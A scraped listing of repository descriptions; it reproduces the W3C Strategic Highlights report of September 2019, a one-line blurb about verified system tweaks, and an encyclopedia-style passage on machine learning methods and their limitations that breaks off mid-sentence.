26 skills found
jettbrains / L W3C Strategic Highlights September 2019 This report was prepared for the September 2019 W3C Advisory Committee Meeting (W3C Member link). See the accompanying W3C Fact Sheet — September 2019. For the previous edition, see the April 2019 W3C Strategic Highlights. For future editions of this report, please consult the latest version. A Chinese translation is available. ☰ Contents Introduction Future Web Standards Meeting Industry Needs Web Payments Digital Publishing Media and Entertainment Web & Telecommunications Real-Time Communications (WebRTC) Web & Networks Automotive Web of Things Strengthening the Core of the Web HTML CSS Fonts SVG Audio Performance Web Performance WebAssembly Testing Browser Testing and Tools WebPlatform Tests Web of Data Web for All Security, Privacy, Identity Internationalization (i18n) Web Accessibility Outreach to the world W3C Developer Relations W3C Training Translations W3C Liaisons Introduction This report highlights recent work of enhancement of the existing landscape of the Web platform and innovation for the growth and strength of the Web. 33 working groups and a dozen interest groups enable W3C to pursue its mission through the creation of Web standards, guidelines, and supporting materials. We track the tremendous work done across the Consortium through homogeneous work-spaces in Github which enables better monitoring and management. We are in the middle of a period where we are chartering numerous working groups which demonstrate the rapid degree of change for the Web platform: After 4 years, we are nearly ready to publish a Payment Request API Proposed Recommendation and we need to soon charter follow-on work. In the last year we chartered the Web Payment Security Interest Group. In the last year we chartered the Web Media Working Group with 7 specifications for next generation Media support on the Web. We have Accessibility Guidelines under W3C Member review which includes Silver, a new approach. We have just launched the Decentralized Identifier Working Group which has tremendous potential because Decentralized Identifier (DID) is an identifier that is globally unique, resolveable with high availability, and cryptographically verifiable. We have Privacy IG (PING) under W3C Member review which strengthens our focus on the tradeoff between privacy and function. We have a new CSS charter under W3C Member review which maps the group's work for the next three years. In this period, W3C and the WHATWG have succesfully completed the negotiation of a Memorandum of Understanding rooted in the mutual belief that that having two distinct specifications claiming to be normative is generally harmful for the Web community. The MOU, signed last May, describes how the two organizations are to collaborate on the development of a single authoritative version of the HTML and DOM specifications. W3C subsequently rechartered the HTML Working Group to assist the W3C community in raising issues and proposing solutions for the HTML and DOM specifications, and for the production of W3C Recommendations from WHATWG Review Drafts. As the Web evolves continuously, some groups are looking for ways for specifications to do so as well. So-called "evergreen recommendations" or "living standards" aim to track continuous development (and maintenance) of features, on a feature-by-feature basis, while getting review and patent commitments. We see the maturation and further development of an incredible number of new technologies coming to the Web. Continued progress in many areas demonstrates the vitality of the W3C and the Web community, as the rest of the report illustrates. Future Web Standards W3C has a variety of mechanisms for listening to what the community thinks could become good future Web standards. These include discussions with the Membership, discussions with other standards bodies, the activities of thousands of participants in over 300 community groups, and W3C Workshops. There are lots of good ideas. The W3C strategy team has been identifying promising topics and invites public participation. Future, recent and under consideration Workshops include: Inclusive XR (5-6 November 2019, Seattle, WA, USA) to explore existing and future approaches on making Virtual and Augmented Reality experiences more inclusive, including to people with disabilities; W3C Workshop on Data Models for Transportation (12-13 September 2019, Palo Alto, CA, USA) W3C Workshop on Web Games (27-28 June 2019, Redmond, WA, USA), view report Second W3C Workshop on the Web of Things (3-5 June 2019, Munich, Germany) W3C Workshop on Web Standardization for Graph Data; Creating Bridges: RDF, Property Graph and SQL (4-6 March 2019, Berlin, Germany), view report Web & Machine Learning. The Strategy Funnel documents the staff's exploration of potential new work at various phases: Exploration and Investigation, Incubation and Evaluation, and eventually to the chartering of a new standards group. The Funnel view is a GitHub Project where new area are issues represented by “cards” which move through the columns, usually from left to right. Most cards start in Exploration and move towards Chartering, or move out of the funnel. Public input is welcome at any stage but particularly once Incubation has begun. This helps W3C identify work that is sufficiently incubated to warrant standardization, to review the ecosystem around the work and indicate interest in participating in its standardization, and then to draft a charter that reflects an appropriate scope. Ongoing feedback can speed up the overall standardization process. Since the previous highlights document, W3C has chartered a number of groups, and started discussion on many more: Newly Chartered or Rechartered Web Application Security WG (03-Apr) Web Payment Security IG (17-Apr) Patent and Standards IG (24-Apr) Web Applications WG (14-May) Web & Networks IG (16-May) Media WG (23-May) Media and Entertainment IG (06-Jun) HTML WG (06-Jun) Decentralized Identifier WG (05-Sep) Extended Privacy IG (PING) (30-Sep) Verifiable Claims WG (30-Sep) Service Workers WG (31-Dec) Dataset Exchange WG (31-Dec) Web of Things Working Group (31-Dec) Web Audio Working Group (31-Dec) Proposed charters / Advance Notice Accessibility Guidelines WG Privacy IG (PING) RDF Literal Direction WG Timed Text WG CSS WG Web Authentication WG Closed Internationalization Tag Set IG Meeting Industry Needs Web Payments All Web Payments specifications W3C's payments standards enable a streamlined checkout experience, enabling a consistent user experience across the Web with lower front end development costs for merchants. Users can store and reuse information and more quickly and accurately complete online transactions. The Web Payments Working Group has republished Payment Request API as a Candidate Recommendation, aiming to publish a Proposed Recommendation in the Fall 2019, and is discussing use cases and features for Payment Request after publication of the 1.0 Recommendation. Browser vendors have been finalizing implementation of features added in the past year (view the implementation report). As work continues on the Payment Handler API and its implementation (currently in Chrome and Edge Canary), one focus in 2019 is to increase adoption in other browsers. Recently, Mastercard demonstrated the use of Payment Request API to carry out EMVCo's Secure Remote Commerce (SRC) protocol whose payment method definition is being developed with active participation by Visa, Mastercard, American Express, and Discover. Payment method availability is a key factor in merchant considerations about adopting Payment Request API. The ability to get uniform adoption of a new payment method such as Secure Remote Commerce (SRC) also depends on the availability of the Payment Handler API in browsers, or of proprietary alternatives. Web Monetization, which the Web Payments Working Group will discuss again at its face-to-face meeting in September, can be used to enable micropayments as an alternative revenue stream to advertising. Since the beginning of 2019, Amazon, Brave Software, JCB, Certus Cybersecurity Solutions and Netflix have joined the Web Payments Working Group. In April, W3C launched the Web Payment Security Group to enable W3C, EMVCo, and the FIDO Alliance to collaborate on a vision for Web payment security and interoperability. Participants will define areas of collaboration and identify gaps between existing technical specifications in order to increase compatibility among different technologies, such as: How do SRC, FIDO, and Payment Request relate? The Payment Services Directive 2 (PSD2) regulations in Europe are scheduled to take effect in September 2019. What is the role of EMVCo, W3C, and FIDO technologies, and what is the current state of readiness for the deadline? How can we improve privacy on the Web at the same time as we meet industry requirements regarding user identity? Digital Publishing All Digital Publishing specifications, Publication milestones The Web is the universal publishing platform. Publishing is increasingly impacted by the Web, and the Web increasingly impacts Publishing. Topic of particular interest to Publishing@W3C include typography and layout, accessibility, usability, portability, distribution, archiving, offline access, print on demand, and reliable cross referencing. And the diverse publishing community represented in the groups consist of the traditional "trade" publishers, ebook reading system manufacturers, but also publishers of audio book, scholarly journals or educational materials, library scientists or browser developers. The Publishing Working Group currently concentrates on Audiobooks which lack a comprehensive standard, thus incurring extra costs and time to publish in this booming market. Active development is ongoing on the future standard: Publication Manifest Audiobook profile for Web Publications Lightweight Packaging Format The BD Comics Manga Community Group, the Synchronized Multimedia for Publications Community Group, the Publishing Community Group and a future group on archival, are companions to the working group where specific work is developed and incubated. The Publishing Community Group is a recently launched incubation channel for Publishing@W3C. The goal of the group is to propose, document, and prototype features broadly related to: publications on the Web reading modes and systems and the user experience of publications The EPUB 3 Community Group has successfully completed the revision of EPUB 3.2. The Publishing Business Group fosters ongoing participation by members of the publishing industry and the overall ecosystem in the development of Web infrastructure to better support the needs of the industry. The Business Group serves as an additional conduit to the Publishing Working Group and several Community Groups for feedback between the publishing ecosystem and W3C. The Publishing BG has played a vital role in fostering and advancing the adoption and continued development of EPUB 3. In particular the BG provided critical support to the update of EPUBCheck to validate EPUB content to the new EPUB 3.2 specification. This resulted in the development, in conjunction with the EPUB3 Community Group, of a new generation of EPUBCheck, i.e., EPUBCheck 4.2 production-ready release. Media and Entertainment All Media specifications The Media and Entertainment vertical tracks media-related topics and features that create immersive experiences for end users. HTML5 brought standard audio and video elements to the Web. Standardization activities since then have aimed at turning the Web into a professional platform fully suitable for the delivery of media content and associated materials, enabling missing features to stream video content on the Web such as adaptive streaming and content protection. Together with Microsoft, Comcast, Netflix and Google, W3C received an Technology & Engineering Emmy Award in April 2019 for standardization of a full TV experience on the Web. Current goals are to: Reinforce core media technologies: Creation of the Media Working Group, to develop media-related specifications incubated in the WICG (e.g. Media Capabilities, Picture-in-picture, Media Session) and maintain maintain/evolve Media Source Extensions (MSE) and Encrypted Media Extensions (EME). Improve support for Media Timed Events: data cues incubation. Enhance color support (HDR, wide gamut), in scope of the CSS WG and in the Color on the Web CG. Reduce fragmentation: Continue annual releases of a common and testable baseline media devices, in scope of the Web Media APIs CG and in collaboration with the CTA WAVE Project. Maintain the Road-map of Media Technologies for the Web which highlights Web technologies that can be used to build media applications and services, as well as known gaps to enable additional use cases. Create the future: Discuss perspectives for Media and Entertainment for the Web. Bring the power of GPUs to the Web (graphics, machine learning, heavy processing), under incubation in the GPU for the Web CG. Transition to a Working Group is under discussion. Determine next steps after the successful W3C Workshop on Web Games of June 2019. View the report. Timed Text The Timed Text Working Group develops and maintains formats used for the representation of text synchronized with other timed media, like audio and video, and notably works on TTML, profiles of TTML, and WebVTT. Recent progress includes: A robust WebVTT implementation report poises the specification for publication as a proposed recommendation. Discussions around re-chartering, notably to add a TTML Profile for Audio Description deliverable to the scope of the group, and clarify that rendering of captions within XR content is also in scope. Immersive Web Hardware that enables Virtual Reality (VR) and Augmented Reality (AR) applications are now broadly available to consumers, offering an immersive computing platform with both new opportunities and challenges. The ability to interact directly with immersive hardware is critical to ensuring that the web is well equipped to operate as a first-class citizen in this environment. The Immersive Web Working Group has been stabilizing the WebXR Device API while the companion Immersive Web Community Group incubates the next series of features identified as key for the future of the Immersive Web. W3C plans a workshop focused on the needs and benefits at the intersection of VR & Accessibility (Inclusive XR), on 5-6 November 2019 in Seattle, WA, USA, to explore existing and future approaches on making Virtual and Augmented Reality experiences more inclusive. Web & Telecommunications The Web is the Open Platform for Mobile. Telecommunication service providers and network equipment providers have long been critical actors in the deployment of Web technologies. As the Web platform matures, it brings richer and richer capabilities to extend existing services to new users and devices, and propose new and innovative services. Real-Time Communications (WebRTC) All Real-Time Communications specifications WebRTC has reshaped the whole communication landscape by making any connected device a potential communication end-point, bringing audio and video communications anywhere, on any network, vastly expanding the ability of operators to reach their customers. WebRTC serves as the corner-stone of many online communication and collaboration services. The WebRTC Working Group aims to bringing WebRTC 1.0 (and companion specification Media Capture and Streams) to Recommendation by the end of 2019. Intense efforts are focused on testing (supported by a dedicated hackathon at IETF 104) and interoperability. The group is considering pushing features that have not gotten enough traction to separate modules or to a later minor revision of the spec. Beyond WebRTC 1.0, the WebRTC Working Group will focus its efforts on WebRTC NV which the group has started documenting by identifying use cases. Web & Networks Recently launched, in the wake of the May 2018 Web5G workshop, the Web & Networks Interest Group is chaired by representatives from AT&T, China Mobile and Intel, with a goal to explore solutions for web applications to achieve better performance and resource allocation, both on the device and network. The group's first efforts are around use cases, privacy & security requirements and liaisons. Automotive All Automotive specifications To create a rich application ecosystem for vehicles and other devices allowed to connect to the vehicle, the W3C Automotive Working Group is delivering a service specification to expose all common vehicle signals (engine temperature, fuel/charge level, range, tire pressure, speed, etc.) The Vehicle Information Service Specification (VISS), which is a Candidate Recommendation, is seeing more implementations across the industry. It provides the access method to a common data model for all the vehicle signals –presently encapsulating a thousand or so different data elements– and will be growing to accommodate the advances in automotive such as autonomous and driver assist technologies and electrification. The group is already working on a successor to VISS, leveraging the underlying data model and the VIWI submission from Volkswagen, for a more robust means of accessing vehicle signals information and the same paradigm for other automotive needs including location-based services, media, notifications and caching content. The Automotive and Web Platform Business Group acts as an incubator for prospective standards work. One of its task forces is using W3C VISS in performing data sampling and off-boarding the information to the cloud. Access to the wealth of information that W3C's auto signals standard exposes is of interest to regulators, urban planners, insurance companies, auto manufacturers, fleet managers and owners, service providers and others. In addition to components needed for data sampling and edge computing, capturing user and owner consent, information collection methods and handling of data are in scope. The upcoming W3C Workshop on Data Models for Transportation (September 2019) is expected to focus on the need of additional ontologies around transportation space. Web of Things All Web of Things specifications W3C's Web of Things work is designed to bridge disparate technology stacks to allow devices to work together and achieve scale, thus enabling the potential of the Internet of Things by eliminating fragmentation and fostering interoperability. Thing descriptions expressed in JSON-LD cover the behavior, interaction affordances, data schema, security configuration, and protocol bindings. The Web of Things complements existing IoT ecosystems to reduce the cost and risk for suppliers and consumers of applications that create value by combining multiple devices and information services. There are many sectors that will benefit, e.g. smart homes, smart cities, smart industry, smart agriculture, smart healthcare and many more. The Web of Things Working Group is finishing the initial Web of Things standards, with support from the Web of Things Interest Group: Web of Things Architecture Thing Descriptions Strengthening the Core of the Web HTML The HTML Working Group was chartered early June to assist the W3C community in raising issues and proposing solutions for the HTML and DOM specifications, and to produce W3C Recommendations from WHATWG Review Drafts. A few days before, W3C and the WHATWG signed a Memorandum of Understanding outlining the agreement to collaborate on the development of a single version of the HTML and DOM specifications. Issues and proposed solutions for HTML and DOM done via the newly rechartered HTML Working Group in the WHATWG repositories The HTML Working Group is targetting November 2019 to bring HTML and DOM to Candidate Recommendations. CSS All CSS specifications CSS is a critical part of the Open Web Platform. The CSS Working Group gathers requirements from two large groups of CSS users: the publishing industry and application developers. Within W3C, those groups are exemplified by the Publishing groups and the Web Platform Working Group. The former requires things like better pagination support and advanced font handling, the latter needs intelligent (and fast!) scrolling and animations. What we know as CSS is actually a collection of almost a hundred specifications, referred to as ‘modules’. The current state of CSS is defined by a snapshot, updated once a year. The group also publishes an index defining every term defined by CSS specifications. Fonts All Fonts specifications The Web Fonts Working Group develops specifications that allow the interoperable deployment of downloadable fonts on the Web, with a focus on Progressive Font Enrichment as well as maintenance of WOFF Recommendations. Recent and ongoing work includes: Early API experiments by Adobe and Monotype have demonstrated the feasibility of a font enrichment API, where a server delivers a font with minimal glyph repertoire and the client can query the full repertoire and request additional subsets on-the-fly. In other experiments, the Brotli compression used in WOFF 2 was extended to support shared dictionaries and patch update. Metrics to quantify improvement are a current hot discussion topic. The group will meet at ATypi 2019 in Japan, to gather requirements from the international typography community. The group will first produce a report summarizing the strengths and weaknesses of each prototype solution by Q2 2020. SVG All SVG specifications SVG is an important and widely-used part of the Open Web Platform. The SVG Working Group focuses on aligning the SVG 2.0 specification with browser implementations, having split the specification into a currently-implemented 2.0 and a forward-looking 2.1. Current activity is on stabilization, increased integration with the Open Web Platform, and test coverage analysis. The Working Group was rechartered in March 2019. A new work item concerns native (non-Web-browser) uses of SVG as a non-interactive, vector graphics format. Audio The Web Audio Working Group was extended to finish its work on the Web Audio API, expecting to publish it as a Recommendation by year end. The specification enables synthesizing audio in the browser. Audio operations are performed with audio nodes, which are linked together to form a modular audio routing graph. Multiple sources — with different types of channel layout — are supported. This modular design provides the flexibility to create complex audio functions with dynamic effects. The first version of Web Audio API is now feature complete and is implemented in all modern browsers. Work has started on the next version, and new features are being incubated in the Audio Community Group. Performance Web Performance All Web Performance specifications There are currently 18 specifications in development in the Web Performance Working Group aiming to provide methods to observe and improve aspects of application performance of user agent features and APIs. The W3C team is looking at related work incubated in the W3C GPU for the Web (WebGPU) Community Group which is poised to transition to a W3C Working Group. A preliminary draft charter is available. WebAssembly All WebAssembly specifications WebAssembly improves Web performance and power by being a virtual machine and execution environment enabling loaded pages to run native (compiled) code. It is deployed in Firefox, Edge, Safari and Chrome. The specification will soon reach Candidate Recommendation. WebAssembly enables near-native performance, optimized load time, and perhaps most importantly, a compilation target for existing code bases. While it has a small number of native types, much of the performance increase relative to Javascript derives from its use of consistent typing. WebAssembly leverages decades of optimization for compiled languages and the byte code is optimized for compactness and streaming (the web page starts executing while the rest of the code downloads). Network and API access all occurs through accompanying Javascript libraries -- the security model is identical to that of Javascript. Requirements gathering and language development occur in the Community Group while the Working Group manages test development, community review and progression of specifications on the Recommendation Track. Testing Browser testing plays a critical role in the growth of the Web by: Improving the reliability of Web technology definitions; Improving the quality of implementations of these technologies by helping vendors to detect bugs in their products; Improving the data available to Web developers on known bugs and deficiencies of Web technologies by publishing results of these tests. Browser Testing and Tools The Browser Testing and Tools Working Group is developing WebDriver version 2, having published last year the W3C Recommendation of WebDriver. WebDriver acts as a remote control interface that enables introspection and control of user agents, provides a platform- and language-neutral wire protocol as a way for out-of-process programs to remotely instruct the behavior of Web, and emulates the actions of a real person using the browser. WebPlatform Tests The WebPlatform Tests project now provides a mechanism which allows to fully automate tests that previously needed to be run manually: TestDriver. TestDriver enables sending trusted key and mouse events, sending complex series of trusted pointer and key interactions for things like in-content drag-and-drop or pinch zoom, and even file upload. Since 2014 W3C began work on this coordinated open-source effort to build a cross-browser test suite for the Web Platform, which WHATWG, and all major browsers adopted. Web of Data All Data specifications There have been several great success stories around the standardization of data on the web over the past year. Verifiable Claims seems to have significant uptake. It is also significant that the Distributed Identifier WG charter has received numerous favorable reviews, and was just recently launched. JSON-LD has been a major success with the large deployment on Web sites via schema.org. JSON-LD 1.1 completed technical work, about to transition to CR More than 25% of websites today include schema.org data in JSON-LD The Web of Things description is in CR since May, making use of JSON-LD Verifiable Credentials data model is in CR since July, also making use of JSON-LD Continued strong interest in decentralized identifiers Engagement from the TAG with reframing core documents, such as Ethical Web Principles, to include data on the web within their scope Data is increasingly important for all organizations, especially with the rise of IoT and Big Data. W3C has a mature and extensive suite of standards relating to data that were developed over two decades of experience, with plans for further work on making it easier for developers to work with graph data and knowledge graphs. Linked Data is about the use of URIs as names for things, the ability to dereference these URIs to get further information and to include links to other data. There are ever-increasing sources of open Linked Data on the Web, as well as data services that are restricted to the suppliers and consumers of those services. The digital transformation of industry is seeking to exploit advanced digital technologies. This will facilitate businesses to integrate horizontally along the supply and value chains, and vertically from the factory floor to the office floor. W3C is seeking to make it easier to support enterprise-wide data management and governance, reflecting the strategic importance of data to modern businesses. Traditional approaches to data have focused on tabular databases (SQL/RDBMS), Comma Separated Value (CSV) files, and data embedded in PDF documents and spreadsheets. We're now in midst of a major shift to graph data with nodes and labeled directed links between them. Graph data is: Faster than using SQL and associated JOIN operations More favorable to integrating data from heterogeneous sources Better suited to situations where the data model is evolving In the wake of the recent W3C Workshop on Graph Data we are in the process of launching a Graph Standardization Business Group to provide a business perspective with use cases and requirements, to coordinate technical standards work and liaisons with external organizations. Web for All Security, Privacy, Identity All Security specifications, all Privacy specifications Authentication on the Web As the WebAuthn Level 1 W3C Recommendation published last March is seeing wide implementation and adoption of strong cryptographic authentication, work is proceeding on Level 2. The open standard Web API gives native authentication technology built into native platforms, browsers, operating systems (including mobile) and hardware, offering protection against hacking, credential theft, phishing attacks, thus aiming to end the era of passwords as a security construct. You may read more in our March press release. Privacy An increasing number of W3C specifications are benefitting from Privacy and Security review; there are security and privacy aspects to every specification. Early review is essential. Working with the TAG, the Privacy Interest Group has updated the Self-Review Questionnaire: Security and Privacy. Other recent work of the group includes public blogging further to the exploration of anti-patterns in standards and permission prompts. Security The Web Application Security Working Group adopted Feature Policy, aiming to allow developers to selectively enable, disable, or modify the behavior of some of these browser features and APIs within their application; and Fetch Metadata, aiming to provide servers with enough information to make a priori decisions about whether or not to service a request based on the way it was made, and the context in which it will be used. The Web Payment Security Interest Group, launched last April, convenes members from W3C, EMVCo, and the FIDO Alliance to discuss cooperative work to enhance the security and interoperability of Web payments (read more about payments). Internationalization (i18n) All Internationalization specifications, educational articles related to Internationalization, spec developers checklist Only a quarter or so current Web users use English online and that proportion will continue to decrease as the Web reaches more and more communities of limited English proficiency. If the Web is to live up to the "World Wide" portion of its name, and for the Web to truly work for stakeholders all around the world engaging with content in various languages, it must support the needs of worldwide users as they engage with content in the various languages. The growth of epublishing also brings requirements for new features and improved typography on the Web. It is important to ensure the needs of local communities are captured. The W3C Internationalization Initiative was set up to increase in-house resources dedicated to accelerating progress in making the World Wide Web "worldwide" by gathering user requirements, supporting developers, and education & outreach. For an overview of current projects see the i18n radar. W3C's Internationalization efforts progressed on a number of fronts recently: Requirements: New African and European language groups will work on the gap analysis, errata and layout requirements. Gap analysis: Japanese, Devanagari, Bengali, Tamil, Lao, Khmer, Javanese, and Ethiopic updated in the gap-analysis documents. Layout requirements document: notable progress tracked in the Southeast Asian Task Force while work continues on Chinese layout requirements. Developer support: Spec reviews: the i18n WG continues active review of specifications of the WHATWG and other W3C Working Groups. Short review checklist: easy way to begin a self-review to help spec developers understand what aspects of their spec are likely to need attention for internationalization, and points them to more detailed checklists for the relevant topics. It also helps those reviewing specs for i18n issues. Strings on the Web: Language and Direction Metadata lays out issues and discusses potential solutions for passing information about language and direction with strings in JSON or other data formats. The document was rewritten for clarity, and expanded. The group is collaborating with the JSON-LD and Web Publishing groups to develop a plan for updating RDF, JSON-LD and related specifications to handle metadata for base direction of text (bidi). User-friendly test format: a new format was developed for Internationalization Test Suite tests, which displays helpful information about how the test works. This particularly useful because those tests are pointed to by educational materials and gap-analysis documents. Web Platform Tests: a large number of tests in the i18n test suite have been ported to the WPT repository, including: css-counter-styles, css-ruby, css-syntax, css-test, css-text-decor, css-writing-modes, and css-pseudo. Education & outreach: (for all educational materials, see the HTML & CSS Authoring Techniques) Web Accessibility All Accessibility specifications, WAI resources The Web Accessibility Initiative supports W3C's Web for All mission. Recent achievements include: Education and training: Inaccessibility of CAPTCHA updated to bring our analysis and recommendations up to date with CAPTCHA practice today, concluding two years of extensive work and invaluable input from the public (read more on the W3C Blog Learn why your web content and applications should be accessible. The Education and Outreach Working Group has completed revision and updating of the Business Case for Digital Accessibility. Accessibility guidelines: The Accessibility Guidelines Working Group has continued to update WCAG Techniques and Understanding WCAG 2.1; and published a Candidate Recommendation of Accessibility Conformance Testing Rules Format 1.0 to improve inter-rater reliability when evaluating conformance of web content to WCAG An updated charter is being developed to host work on "Silver", the next generation accessibility guidelines (WCAG 2.2) There are accessibility aspects to most specifications. Check your work with the FAST checklist. Outreach to the world W3C Developer Relations To foster the excellent feedback loop between Web Standards development and Web developers, and to grow participation from that diverse community, recent W3C Developer Relations activities include: @w3cdevs tracks the enormous amount of work happening across W3C W3C Track during the Web Conference 2019 in San Francisco Tech videos: W3C published the 2019 Web Games Workshop videos The 16 September 2019 Developer Meetup in Fukuoka, Japan, is open to all and will combine a set of technical demos prepared by W3C groups, and a series of talks on a selected set of W3C technologies and projects W3C is involved with Mozilla, Google, Samsung, Microsoft and Bocoup in the organization of ViewSource 2019 in Amsterdam (read more on the W3C Blog) W3C Training In partnership with EdX, W3C's MOOC training program, W3Cx offers a complete "Front-End Web Developer" (FEWD) professional certificate program that consists of a suite of five courses on the foundational languages that power the Web: HTML5, CSS and JavaScript. We count nearly 900K students from all over the world. Translations Many Web users rely on translations of documents developed at W3C whose official language is English. W3C is extremely grateful to the continuous efforts of its community in ensuring our various deliverables in general, and in our specifications in particular, are made available in other languages, for free, ensuring their exposure to a much more diverse set of readers. Last Spring we developed a more robust system, a new listing of translations of W3C specifications and updated the instructions on how to contribute to our translation efforts. W3C Liaisons Liaisons and coordination with numerous organizations and Standards Development Organizations (SDOs) is crucial for W3C to: make sure standards are interoperable coordinate our respective agenda in Internet governance: W3C participates in ICANN, GIPO, IGF, the I* organizations (ICANN, IETF, ISOC, IAB). ensure at the government liaison level that our standards work is officially recognized when important to our membership so that products based on them (often done by our members) are part of procurement orders. W3C has ARO/PAS status with ISO. W3C participates in the EU MSP and Rolling Plan on Standardization ensure the global set of Web and Internet standards form a compatible stack of technologies, at the technical and policy level (patent regime, fragmentation, use in policy making) promote Standards adoption equally by the industry, the public sector, and the public at large Coralie Mercier, Editor, W3C Marketing & Communications $Id: Overview.html,v 1.60 2019/10/15 12:05:52 coralie Exp $ Copyright © 2019 W3C ® (MIT, ERCIM, Keio, Beihang) Usage policies apply.
AlchemyTweaks / Verified TweaksThe “Verified Tweaks” section includes empirically validated system configurations, derived from controlled benchmarking scenarios and frame-level telemetry analysis. Each modification has been replicated, documented, and verified through captured test sessions,ensuring methodological rigor and reliable performance impact.
Aryia-Behroziuan / NeuronsAn ANN is a model based on a collection of connected units or nodes called "artificial neurons", which loosely model the neurons in a biological brain. Each connection, like the synapses in a biological brain, can transmit information, a "signal", from one artificial neuron to another. An artificial neuron that receives a signal can process it and then signal additional artificial neurons connected to it. In common ANN implementations, the signal at a connection between artificial neurons is a real number, and the output of each artificial neuron is computed by some non-linear function of the sum of its inputs. The connections between artificial neurons are called "edges". Artificial neurons and edges typically have a weight that adjusts as learning proceeds. The weight increases or decreases the strength of the signal at a connection. Artificial neurons may have a threshold such that the signal is only sent if the aggregate signal crosses that threshold. Typically, artificial neurons are aggregated into layers. Different layers may perform different kinds of transformations on their inputs. Signals travel from the first layer (the input layer) to the last layer (the output layer), possibly after traversing the layers multiple times. The original goal of the ANN approach was to solve problems in the same way that a human brain would. However, over time, attention moved to performing specific tasks, leading to deviations from biology. Artificial neural networks have been used on a variety of tasks, including computer vision, speech recognition, machine translation, social network filtering, playing board and video games and medical diagnosis. Deep learning consists of multiple hidden layers in an artificial neural network. This approach tries to model the way the human brain processes light and sound into vision and hearing. Some successful applications of deep learning are computer vision and speech recognition.[68] Decision trees Main article: Decision tree learning Decision tree learning uses a decision tree as a predictive model to go from observations about an item (represented in the branches) to conclusions about the item's target value (represented in the leaves). It is one of the predictive modeling approaches used in statistics, data mining, and machine learning. Tree models where the target variable can take a discrete set of values are called classification trees; in these tree structures, leaves represent class labels and branches represent conjunctions of features that lead to those class labels. Decision trees where the target variable can take continuous values (typically real numbers) are called regression trees. In decision analysis, a decision tree can be used to visually and explicitly represent decisions and decision making. In data mining, a decision tree describes data, but the resulting classification tree can be an input for decision making. Support vector machines Main article: Support vector machines Support vector machines (SVMs), also known as support vector networks, are a set of related supervised learning methods used for classification and regression. Given a set of training examples, each marked as belonging to one of two categories, an SVM training algorithm builds a model that predicts whether a new example falls into one category or the other.[69] An SVM training algorithm is a non-probabilistic, binary, linear classifier, although methods such as Platt scaling exist to use SVM in a probabilistic classification setting. In addition to performing linear classification, SVMs can efficiently perform a non-linear classification using what is called the kernel trick, implicitly mapping their inputs into high-dimensional feature spaces. Illustration of linear regression on a data set. Regression analysis Main article: Regression analysis Regression analysis encompasses a large variety of statistical methods to estimate the relationship between input variables and their associated features. Its most common form is linear regression, where a single line is drawn to best fit the given data according to a mathematical criterion such as ordinary least squares. The latter is often extended by regularization (mathematics) methods to mitigate overfitting and bias, as in ridge regression. When dealing with non-linear problems, go-to models include polynomial regression (for example, used for trendline fitting in Microsoft Excel[70]), logistic regression (often used in statistical classification) or even kernel regression, which introduces non-linearity by taking advantage of the kernel trick to implicitly map input variables to higher-dimensional space. Bayesian networks Main article: Bayesian network A simple Bayesian network. Rain influences whether the sprinkler is activated, and both rain and the sprinkler influence whether the grass is wet. A Bayesian network, belief network, or directed acyclic graphical model is a probabilistic graphical model that represents a set of random variables and their conditional independence with a directed acyclic graph (DAG). For example, a Bayesian network could represent the probabilistic relationships between diseases and symptoms. Given symptoms, the network can be used to compute the probabilities of the presence of various diseases. Efficient algorithms exist that perform inference and learning. Bayesian networks that model sequences of variables, like speech signals or protein sequences, are called dynamic Bayesian networks. Generalizations of Bayesian networks that can represent and solve decision problems under uncertainty are called influence diagrams. Genetic algorithms Main article: Genetic algorithm A genetic algorithm (GA) is a search algorithm and heuristic technique that mimics the process of natural selection, using methods such as mutation and crossover to generate new genotypes in the hope of finding good solutions to a given problem. In machine learning, genetic algorithms were used in the 1980s and 1990s.[71][72] Conversely, machine learning techniques have been used to improve the performance of genetic and evolutionary algorithms.[73] Training models Usually, machine learning models require a lot of data in order for them to perform well. Usually, when training a machine learning model, one needs to collect a large, representative sample of data from a training set. Data from the training set can be as varied as a corpus of text, a collection of images, and data collected from individual users of a service. Overfitting is something to watch out for when training a machine learning model. Federated learning Main article: Federated learning Federated learning is an adapted form of distributed artificial intelligence to training machine learning models that decentralizes the training process, allowing for users' privacy to be maintained by not needing to send their data to a centralized server. This also increases efficiency by decentralizing the training process to many devices. For example, Gboard uses federated machine learning to train search query prediction models on users' mobile phones without having to send individual searches back to Google.[74] Applications There are many applications for machine learning, including: Agriculture Anatomy Adaptive websites Affective computing Banking Bioinformatics Brain–machine interfaces Cheminformatics Citizen science Computer networks Computer vision Credit-card fraud detection Data quality DNA sequence classification Economics Financial market analysis[75] General game playing Handwriting recognition Information retrieval Insurance Internet fraud detection Linguistics Machine learning control Machine perception Machine translation Marketing Medical diagnosis Natural language processing Natural language understanding Online advertising Optimization Recommender systems Robot locomotion Search engines Sentiment analysis Sequence mining Software engineering Speech recognition Structural health monitoring Syntactic pattern recognition Telecommunication Theorem proving Time series forecasting User behavior analytics In 2006, the media-services provider Netflix held the first "Netflix Prize" competition to find a program to better predict user preferences and improve the accuracy of its existing Cinematch movie recommendation algorithm by at least 10%. A joint team made up of researchers from AT&T Labs-Research in collaboration with the teams Big Chaos and Pragmatic Theory built an ensemble model to win the Grand Prize in 2009 for $1 million.[76] Shortly after the prize was awarded, Netflix realized that viewers' ratings were not the best indicators of their viewing patterns ("everything is a recommendation") and they changed their recommendation engine accordingly.[77] In 2010 The Wall Street Journal wrote about the firm Rebellion Research and their use of machine learning to predict the financial crisis.[78] In 2012, co-founder of Sun Microsystems, Vinod Khosla, predicted that 80% of medical doctors' jobs would be lost in the next two decades to automated machine learning medical diagnostic software.[79] In 2014, it was reported that a machine learning algorithm had been applied in the field of art history to study fine art paintings and that it may have revealed previously unrecognized influences among artists.[80] In 2019 Springer Nature published the first research book created using machine learning.[81] Limitations Although machine learning has been transformative in some fields, machine-learning programs often fail to deliver expected results.[82][83][84] Reasons for this are numerous: lack of (suitable) data, lack of access to the data, data bias, privacy problems, badly chosen tasks and algorithms, wrong tools and people, lack of resources, and evaluation problems.[85] In 2018, a self-driving car from Uber failed to detect a pedestrian, who was killed after a collision.[86] Attempts to use machine learning in healthcare with the IBM Watson system failed to deliver even after years of time and billions of dollars invested.[87][88] Bias Main article: Algorithmic bias Machine learning approaches in particular can suffer from different data biases. A machine learning system trained on current customers only may not be able to predict the needs of new customer groups that are not represented in the training data. When trained on man-made data, machine learning is likely to pick up the same constitutional and unconscious biases already present in society.[89] Language models learned from data have been shown to contain human-like biases.[90][91] Machine learning systems used for criminal risk assessment have been found to be biased against black people.[92][93] In 2015, Google photos would often tag black 